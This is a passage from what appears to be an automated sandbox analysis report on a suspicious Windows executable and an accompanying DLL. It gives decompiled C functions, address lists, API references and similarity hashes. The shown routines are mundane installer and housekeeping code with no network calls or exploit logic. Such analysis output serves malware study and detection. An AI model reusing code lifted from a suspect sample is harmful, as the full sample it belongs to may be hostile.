						 *_a12 = 0x48;
						LeaveCriticalSection(0x6ff850ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbd;
				}
			}




                0x6ff81b37
                0x6ff81b50
                0x6ff81b5d
                0x6ff81b67
                0x6ff81b79
                0x00000000
                0x6ff81b89
                0x6ff81b8d
                0x6ff81baa
                0x6ff81bcf
                0x6ff81be0
                0x6ff81bec
                0x6ff81bf8
                0x6ff81c04
                0x6ff81c10
                0x6ff81c1c
                0x6ff81c22
                0x6ff81c2d
                0x00000000
                0x6ff81c33
                0x6ff81baf
                0x6ff81bba
                0x00000000
                0x6ff81bc0
                0x6ff81b94
                0x00000000
                0x6ff81b9a

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81B5D
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81B79
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81B94
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81BBA
                • memset.MSVCRT ref: 6FF81BCF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81C2D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Entermemset
                • String ID: %p %d %p %p$1HDP$p-w
                • API String ID: 2581898777-2455463802
                • Opcode ID: 9afd512a9e6091f151f222e9e98f75a72624d53a4b87fa1f9a245df4b0e219fc
                • Instruction ID: b47ffb6cdd1f4ebb81bbc2f625be84e17ca4c34b9107786808a345b272defb3a
                • Opcode Fuzzy Hash: 9afd512a9e6091f151f222e9e98f75a72624d53a4b87fa1f9a245df4b0e219fc
                • Instruction Fuzzy Hash: 5F31E6B9600209DFCB04CF48C544A9E7BF1BF4A314F218599F8269B361D735ED11CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                0x00405dfc
                0x00405e04
                0x00405e18
                0x00405e18
                0x00405e1e
                0x00405e2b
                0x00405e2b
                0x00405e2c
                0x00405e2e
                0x00405e32
                0x00405e34
                0x00405e3d
                0x00405e3f
                0x00405e59
                0x00405e61
                0x00405e61
                0x00405e66
                0x00405e68
                0x00405e6a
                0x00405e6e
                0x00405e6f
                0x00405e72
                0x00405e7a
                0x00405e7c
                0x00405e80
                0x00000000
                0x00000000
                0x00405e86
                0x00405e8b
                0x00000000
                0x00000000
                0x00000000
                0x00405e8b
                0x00405e90

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E52
                • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                • CharNextA.USER32(?,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E64
                • CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E74
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Char$Next$Prev
                • String ID: "C:\Users\user\Desktop\RHK098760045678009000.exe" $*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 589700163-2835513813
                • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81290, Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E6FF81290(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr _t67;
				signed int _t96;
				void* _t100;
				void* _t102;
				void* _t103;

				_v16 = _a4;
				_t53 = _a8;
				0x6ff80000(_t53, _a12, _a16);
				0x6ff80000("%p %s %lx %p\n", _a4, _t53);
				_t102 = _t100 + 0x18;
				if(_a8 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					EnterCriticalSection(0x6ff850ac);
					if(_v16 == 0 ||  *_v16 != 0x50444830) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						_t56 = _a16;
						 *_t56 = 0;
						_v8 = 0;
						while(1) {
							0x6ff80000(0x6ff84170);
							_t103 = _t102 + 4;
							if(_v8 >= _t56) {
								break;
							}
							_t18 = (_v8 << 5) + 0x6ff84174; // 0x6ff86658
							_t74 =  *_t18;
							_t56 = E6FF82D50( *_t18, _a8);
							_t102 = _t103 + 8;
							if(_t56 == 0) {
								_v8 = _v8 + 1;
								continue;
							}
							_v12 = E6FF82BE0(_t56, _t74);
							if(_v12 == 0) {
								LeaveCriticalSection(0x6ff850ac);
								return 0xc0000bbb;
							}
							_t22 = (_v8 << 5) + 0x6ff84174; // 0x6ff86658
							 *((intOrPtr*)(_v12 + 4)) = E6FF82B30(_t74,  *_t22);
							_t27 = (_v8 << 5) + 0x6ff84178; // 0x6ff82c90
							 *((intOrPtr*)(_v12 + 0x30)) =  *_t27;
							_t31 = (_v8 << 5) + 0x6ff8417c; // 0x21510500
							 *((intOrPtr*)(_v12 + 8)) =  *_t31;
							_t35 = (_v8 << 5) + 0x6ff84180; // 0xfffffffb
							 *((intOrPtr*)(_v12 + 0x14)) =  *_t35;
							_t96 = _v8 << 5;
							_t67 = _v12;
							_t39 = _t96 + 0x6ff84188; // 0x989680
							 *((intOrPtr*)(_t67 + 0x20)) =  *_t39;
							_t41 = _t96 + 0x6ff8418c; // 0x0
							 *((intOrPtr*)(_t67 + 0x24)) =  *_t41;
							 *((intOrPtr*)(_v12 + 0x1c)) =  *((intOrPtr*)(_v16 + 4));
							 *((intOrPtr*)(_v12 + 0x18)) = _a12;
							 *_a16 = _v12;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bb9;
					}
				}
			}













                0x6ff81299
                0x6ff812a4
                0x6ff812a8
                0x6ff812ba
                0x6ff812bf
                0x6ff812c6
                0x00000000
                0x6ff812d8
                0x6ff812dd
                0x6ff812e7
                0x6ff812f9
                0x00000000
                0x6ff81309
                0x6ff81309
                0x6ff8130c
                0x6ff81312
                0x6ff81324
                0x6ff81329
                0x6ff8132e
                0x6ff81334
                0x00000000
                0x00000000
                0x6ff81344
                0x6ff81344
                0x6ff8134b
                0x6ff81350
                0x6ff81355
                0x6ff81321
                0x00000000
                0x6ff81321
                0x6ff81360
                0x6ff81367
                0x6ff8140a
                0x00000000
                0x6ff81410
                0x6ff81373
                0x6ff81385
                0x6ff81391
                0x6ff81397
                0x6ff813a3
                0x6ff813a9
                0x6ff813b5
                0x6ff813bb
                0x6ff813c1
                0x6ff813c4
                0x6ff813c7
                0x6ff813cd
                0x6ff813d0
                0x6ff813d6
                0x6ff813e2
                0x6ff813eb
                0x6ff813f4
                0x6ff813fb
                0x00000000
                0x6ff81401
                0x6ff81421
                0x00000000
                0x6ff81427
                0x6ff812e7

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF812DD
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF812F9
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81421
                  • Part of subcall function 6FF82D50: wcschr.MSVCRT ref: 6FF82D87
                  • Part of subcall function 6FF82D50: wcschr.MSVCRT ref: 6FF82DCF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF813FB
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8140A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$wcschr$Enter
                • String ID: %p %s %lx %p$0HDP$p-w
                • API String ID: 263007561-2707375437
                • Opcode ID: 030f71b02618c64b2b61af81ae5091bbe9d286762e2bef2dabd3cbac3f1bfbcc
                • Instruction ID: 1b9114f14fb820f9e7049a2ebd201caa4257898eb0dfbd7a5600abb1af13918d
                • Opcode Fuzzy Hash: 030f71b02618c64b2b61af81ae5091bbe9d286762e2bef2dabd3cbac3f1bfbcc
                • Instruction Fuzzy Hash: 76417AB4A00608EFDB04DF98D580A9EBBB5FF4A314F118299E8359B355D731EA80CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                0x00403ecd
                0x00403f61
                0x00000000
                0x00403f61
                0x00403ede
                0x00403ee2
                0x00000000
                0x00000000
                0x00403ee8
                0x00403ef1
                0x00403ef4
                0x00403ef4
                0x00403efa
                0x00403f00
                0x00403f00
                0x00403f0c
                0x00403f12
                0x00403f19
                0x00403f1c
                0x00403f1f
                0x00403f21
                0x00403f21
                0x00403f29
                0x00403f2f
                0x00403f2f
                0x00403f39
                0x00403f3e
                0x00403f41
                0x00403f46
                0x00403f49
                0x00403f49
                0x00403f59
                0x00403f59
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54; // 0x2b400
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                0x004026af
                0x004026b1
                0x004026bd
                0x004026c0
                0x004026ca
                0x004026ce
                0x004026ce
                0x004026d4
                0x004026e1
                0x004026e9
                0x004026ec
                0x004026f2
                0x00402700
                0x00402705
                0x00402709
                0x0040270c
                0x00402715
                0x00402721
                0x00402725
                0x00402728
                0x00402732
                0x00402751
                0x00402739
                0x0040273e
                0x00402746
                0x00402749
                0x0040274e
                0x0040274e
                0x00402758
                0x00402758
                0x0040276a
                0x00402771
                0x00402783
                0x00402783
                0x00402789
                0x00402789
                0x00402794
                0x00402795
                0x00402799
                0x0040279d
                0x004027a3
                0x004027a3
                0x004027aa
                0x00402197
                0x004028c1
                0x004028cd

                APIs
                • GlobalAlloc.KERNEL32(00000040,0002B400,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                • GlobalFree.KERNEL32 ref: 00402758
                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                • GlobalFree.KERNEL32 ref: 00402771
                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                • String ID:
                • API String ID: 3294113728-0
                • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                0x00404e8a
                0x00404e96
                0x00404e99
                0x00404e9f
                0x00404eab
                0x00404eae
                0x00404eb1
                0x00404eb7
                0x00404eb7
                0x00404ebd
                0x00404ec5
                0x00404ec8
                0x00404ee5
                0x00404ee9
                0x00404ef2
                0x00404ef2
                0x00404efc
                0x00404f05
                0x00404f11
                0x00404f18
                0x00404f1c
                0x00404f1f
                0x00404f32
                0x00404f40
                0x00404f40
                0x00404f44
                0x00404f46
                0x00404f49
                0x00000000
                0x00404f49
                0x00404eca
                0x00404ed2
                0x00404eda
                0x00404ee0
                0x00000000
                0x00404ee0
                0x00404eda
                0x00404ec8
                0x00404f53

                APIs
                • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                • SendMessageA.USER32 ref: 00404F18
                • SendMessageA.USER32 ref: 00404F32
                • SendMessageA.USER32 ref: 00404F40
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF818C0, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 56%
                			E6FF818C0(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x6ff80000("%p %x %p %p\n", _a4, _a8, _a12, _a16);
				if(_a16 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						if( *((intOrPtr*)(_v8 + 0xc)) == 0) {
							_push(_a16);
							_push(_v8 + 0x40);
							_push(_v8 + 0x38);
							_push(_a8);
							_v12 = E6FF82E80(_v8);
							if(_v12 == 0) {
								 *_a16 = 0;
								if(_a12 != 0) {
									 *_a12 =  *((intOrPtr*)(_v8 + 8));
								}
							}
							LeaveCriticalSection(0x6ff850ac);
							return _v12;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bc6;
					}
				}
				return 0xc0000bbd;
			}





                0x6ff818c9
                0x6ff818e1
                0x6ff818ed
                0x6ff818fe
                0x6ff81908
                0x6ff8191a
                0x00000000
                0x6ff81927
                0x6ff8192e
                0x6ff81945
                0x6ff8194c
                0x6ff81953
                0x6ff81957
                0x6ff81964
                0x6ff8196b
                0x6ff81970
                0x6ff8197a
                0x6ff81985
                0x6ff81985
                0x6ff8197a
                0x6ff8198c
                0x00000000
                0x6ff81992
                0x6ff81935
                0x00000000
                0x6ff8193b
                0x6ff81908
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF818FE
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8191A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %x %p %p$1HDP$p-w
                • API String ID: 3168844106-2712400308
                • Opcode ID: fdf1f510e15b4183584d26adb2e3007729692b69529440385da030728344b43a
                • Instruction ID: e08a3a759cfa96f015ff430fdf49c5bb0397abd7e6ad8b64fc818e5805665c9e
                • Opcode Fuzzy Hash: fdf1f510e15b4183584d26adb2e3007729692b69529440385da030728344b43a
                • Instruction Fuzzy Hash: 59213AB5601249EFDB00CF98D944BAE7BB5BF4A319F108249F8269B340D774AE50CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81570, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 65COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E6FF81570(intOrPtr* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t18;
				intOrPtr _t19;
				signed int _t21;
				signed int* _t31;

				_v8 = _a4;
				0x6ff80000("%p %p\n", _a4, _a8);
				if(_a8 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0) {
						L4:
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					}
					_t18 = _v8;
					if( *_t18 == 0x50444830) {
						0x6ff80000(1);
						if(_t18 == 0) {
							_t19 = E6FF82EB0(_t18);
							0x6ff80000(2, _v8);
							_v16 = _t19;
							_t21 = E6FF81000( *((intOrPtr*)(_v12 + 0x2c)), 0x20, 0);
							_t31 = _a8;
							 *_t31 = _t21 |  *(_v12 + 0x28);
							_t31[1] = 0;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0x800007d5;
					}
					goto L4;
				}
				return 0xc0000bbd;
			}










                0x6ff8157a
                0x6ff8158a
                0x6ff81596
                0x6ff815a7
                0x6ff815b1
                0x6ff815be
                0x6ff815c3
                0x00000000
                0x6ff815c9
                0x6ff815b3
                0x6ff815bc
                0x6ff815d2
                0x6ff815dc
                0x6ff815f4
                0x6ff815fe
                0x6ff81606
                0x6ff81615
                0x6ff81624
                0x6ff81627
                0x6ff81629
                0x6ff81631
                0x00000000
                0x6ff81637
                0x6ff815e3
                0x00000000
                0x6ff815e9
                0x00000000
                0x6ff815bc
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF815A7
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF815C3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p$0HDP$p-w
                • API String ID: 3168844106-1388213855
                • Opcode ID: 385e9128b9c0d01ad50738c4d29d6e46be301be91b5c894471ccb04886c564e9
